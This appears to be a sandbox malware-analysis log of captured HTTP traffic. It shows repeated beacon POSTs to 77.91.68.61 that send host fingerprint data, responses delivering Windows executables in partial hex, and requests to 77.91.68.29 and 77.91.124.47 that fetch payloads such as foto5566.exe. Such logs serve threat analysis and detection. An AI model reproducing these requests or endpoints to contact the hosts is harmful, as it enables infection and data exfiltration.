Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 27 Jul 2023 07:32:42 GMTAccept-Ranges: bytesETag: "9d577f875cc0d91:0"Server: Microsoft-IIS/10.0Date: Thu, 27 Jul 2023 07:32:58 GMTContent-Length: 399360Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 e2 25 87 93 83 4b d4 93 83 4b d4 93 83 4b d4 f6 e5 4e d5 92 83 4b d4 f6 e5 48 d5 92 83 4b d4 f6 e5 4f d5 87 83 4b d4 f6 e5 4a d5 82 83 4b d4 93 83 4a d4 0d 83 4b d4 f6 e5 43 d5 9a 83 4b d4 f6 e5 b4 d4 92 83 4b d4 f6 e5 49 d5 92 83 4b d4 52 69 63 68 93 83 4b d4 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 60 8d 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 0d 00 64 00 00 00 b0 05 00 00 00 00 00 60 6a 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 70 06 00 00 04 00 00 c6 91 06 00 02 00 40 c1 00 00 04 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c a2 00 00 b4 00 00 00 00 c0 00 00 20 91 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 06 00 88 08 00 00 10 14 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 63 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1a 00 00 00 80 00 00 00 02 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 52 10 00 00 00 a0 00 00 00 12 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 a0 05 00 00 c0 00 00 00 92 05 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 88 08 00 00 00 60 06 00 00 0a 00 00 00 0e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 27 Jul 2023 07:29:55 GMTAccept-Ranges: bytesETag: "d55cf235cc0d91:0"Server: Microsoft-IIS/10.0Date: Thu, 27 Jul 2023 07:32:59 GMTContent-Length: 399360Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 e2 25 87 93 83 4b d4 93 83 4b d4 93 83 4b d4 f6 e5 4e d5 92 83 4b d4 f6 e5 48 d5 92 83 4b d4 f6 e5 4f d5 87 83 4b d4 f6 e5 4a d5 82 83 4b d4 93 83 4a d4 0d 83 4b d4 f6 e5 43 d5 9a 83 4b d4 f6 e5 b4 d4 92 83 4b d4 f6 e5 49 d5 92 83 4b d4 52 69 63 68 93 83 4b d4 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 60 8d 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 0d 00 64 00 00 00 b0 05 00 00 00 00 00 60 6a 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 70 06 00 00 04 00 00 c4 3f 06 00 02 00 40 c1 00 00 04 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c a2 00 00 b4 00 00 00 00 c0 00 00 ac 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 06 00 88 08 00 00 10 14 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 63 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1a 00 00 00 80 00 00 00 02 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 52 10 00 00 00 a0 00 00 00 12 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 a0 05 00 00 c0 00 00 00 92 05 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 88 08 00 00 00 60 06 00 00 0a 00 00 00 0e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Wed, 26 Jul 2023 19:36:40 GMTAccept-Ranges: bytesETag: "e6c4cb7ff8bfd91:0"Server: Microsoft-IIS/10.0Date: Thu, 27 Jul 2023 07:33:00 GMTContent-Length: 165888Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 44 d8 fe 65 00 b9 90 36 00 b9 90 36 00 b9 90 36 14 d2 95 37 01 b9 90 36 14 d2 93 37 02 b9 90 36 14 d2 94 37 12 b9 90 36 14 d2 91 37 11 b9 90 36 00 b9 91 36 a0 b9 90 36 14 d2 98 37 0a b9 90 36 14 d2 6f 36 01 b9 90 36 14 d2 92 37 01 b9 90 36 52 69 63 68 00 b9 90 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f8 c4 1b ae 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 14 00 7c 00 00 00 08 02 00 00 00 00 00 00 82 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 e9 e6 02 00 02 00 60 c1 00 00 08 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c a2 00 00 b4 00 00 00 00 f0 00 00 24 d6 01 00 00 e0 00 00 08 04 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 20 00 00 00 10 9a 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 90 00 00 18 01 00 00 00 00 00 00 00 00 00 00 28 91 00 00 20 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 7b 00 00 00 10 00 00 00 7c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 22 00 00 00 90 00 00 00 24 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 1f 00 00 00 c0 00 00 00 04 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 04 00 00 00 e0 00 00 00 06 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 e0 01 00 00 f0 00 00 00 d8 01 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 00 00 00 00 d0 02 00 00 02 00 00 00 86 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jul 2023 23:33:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 26 Jul 2023 23:06:22 GMTETag: "16ab15-6016be5651780"Accept-Ranges: bytesContent-Length: 1485589Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 02 d9 3d 4c 46 b8 53 1f 46 b8 53 1f 46 b8 53 1f f2 24 a2 1f 4b b8 53 1f f2 24 a0 1f cb b8 53 1f f2 24 a1 1f 5e b8 53 1f c6 c3 ae 1f 44 b8 53 1f c6 c3 57 1e 55 b8 53 1f c6 c3 50 1e 51 b8 53 1f c6 c3 56 1e 74 b8 53 1f 4f c0 d0 1f 4d b8 53 1f 4f c0 c0 1f 41 b8 53 1f 46 b8 52 1f 4e b9 53 1f c8 c3 56 1e 60 b8 53 1f c8 c3 53 1e 47 b8 53 1f c8 c3 ac 1f 47 b8 53 1f c8 c3 51 1e 47 b8 53 1f 52 69 63 68 46 b8 53 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 66 a1 b9 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 21 00 7e 02 00 00 12 05 00 00 00 00 00 e0 5d 01 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 07 00 00 04 00 00 00 00 00 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 30 2a 03 00 34 00 00 00 64 2a 03 00 50 00 00 00 00 b0 06 00 f8 df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 07 00 54 29 00 00 40 0e 03 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 b3 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 2c 02 00 00 5c 20 03 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 7d 02 00 00 10 00 00 00 7e 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 a6 00 00 00 90 02 00 00 a8 00 00 00 82 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 5c 03 00 00 40 03 00 00 10 00 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 78 01 00 00 00 a0 06 00 00 02 00 00 00 3a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 b0 06 00 00 e0 00 00 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 29 00 00 00 90 07 00 00 2a 00 00 00 1c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jul 2023 23:33:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 24 Jul 2023 12:36:25 GMTETag: "16400-6013adce177e0"Accept-Ranges: bytesContent-Length: 91136Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c5 6c be 64 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /fks/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://owqnotnc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: 77.91.68.29
Source: global traffic	HTTP traffic detected: POST /fks/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qsrgpskjgs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: 77.91.68.29
Source: global traffic	HTTP traffic detected: GET /new/foto5566.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.91.124.47
Source: global traffic	HTTP traffic detected: POST /fks/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dmivtlj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: 77.91.68.29
Source: global traffic	HTTP traffic detected: POST /fks/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://liwhncy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: 77.91.68.29
Source: global traffic	HTTP traffic detected: GET /new/fotod250.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.91.124.47
